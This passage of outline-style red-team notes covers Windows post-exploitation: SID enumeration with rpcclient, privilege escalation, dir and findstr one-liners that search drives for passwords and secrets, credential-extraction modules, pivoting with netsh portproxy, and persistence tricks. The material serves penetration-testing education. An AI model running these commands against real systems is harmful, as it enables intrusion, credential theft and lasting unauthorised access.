            rpcclient -U "user%Password1" -W DOMAIN 1.2.3.4 -c "lookupsids s-1-5-21-1289870825-1602939633-2792175544-$i"
        done
        ```
      * People's passwords suck
    * https://www.corelan.be/index.php/my-free-tools/ad-cs/pve-find-ad-user/
  * Zombies
    * runas
      * ShellExecute, CreateProcessWithLogon, LogonUser
    * WCE + runhash32/64
      * user level psexec == zombie user & token
    * Run executable in memory
  * Privilege Escalation
    * Good
      * getsystem
      * Post modules
        * Keyboard layout
        * Bypassuac
      * Core Impact / Canvas ship with locals
        * Honestly a big lacking area for MSF
    * Better?
      * DomainDrop?
        * client.railgun.netapi32.NetUnjoinDomain(nil,nil,nil,nil)
    * Best
      * Just ask for it...
        * Tasklist
          * tasklist /V /S $IP /U $user /P $password
          * for /F "skip=3 delims=\" %A in ('net view') do tasklist /V /S %A /U $user /P $password
  * Finding the data that actually matters...
    * Good "Searching for Gold"
      * dir /s "My Documents"
      * dir /s "Desktop"
      * dir /s *.pcf
      * ListDrives
      * Searching for files
        * dir c:\*password* /s
        * dir c:\*competitor* /s
        * dir c:\*finance* /s
        * dir c:\*risk* /s
        * dir c:\*assessment* /s
        * dir c:\*.key* /s
        * dir c:\*.vsd /s
        * dir c:\*.pcf /s
        * dir c:\*.ica /s
        * dir c:\*.crt /s
        * dir c:\*.log /s
      * Searching in files
        * findstr /I /N /S /P /C:password *
        * findstr /I /N /S /P /C:secret *
        * findstr /I /N /S /P /C:confidential *
        * findstr /I /N /S /P /C:account *
      * Powershell/WMIC to do it
    * Better
      * Dumplinks
      * GetFirefoxCreds
      * GetPidginCreds
      * Outlook, IE, Chrome, RDP, Password Extraction
        * Basically the whole 'credentials' post module section
      * SharePoint
      * intranet.company.com
    * Best
      * OpenDLP
      * Fiction's Database Searcher
      * Search in Meterpreter
        * Uses windows indexing i.e. outlook email
      * dir /s $share > filetosearchoffline.txt
        * findstr too
        * throw into a click script?
  * Pivoting
    * portforwarding
      * meterpreter portfwd
      * route
      * socks4a module + meterpreter session
      * pro VPN pivot?
    * portproxy
      * built into windows
        * netsh interface portproxy>add v4tov4 listenport=25 connectaddress=192.168.0.100 connectport=80 protocol=tcp
    * Legitimate Access via VPN, Term Server, Citrix, etc
  * Persistence
    * "One week isn't showing impact of internal awarenes..."
    * Autoruns
    * smartlocker -> lockout_recorder
      * http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html
    * Fxsst.dll
      * https://blog.mandiant.com/archives/1786
      * http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html
    * gpo_dropper hbgary
      * http://www.hbgary.com/malware-using-local-group-policy
    * IPv6 Dropper
      * http://hak5.org/hack/ipv6-from-the-pentesters-perspective
  * https://github.com/mubix/Not-In-Pentesting-Class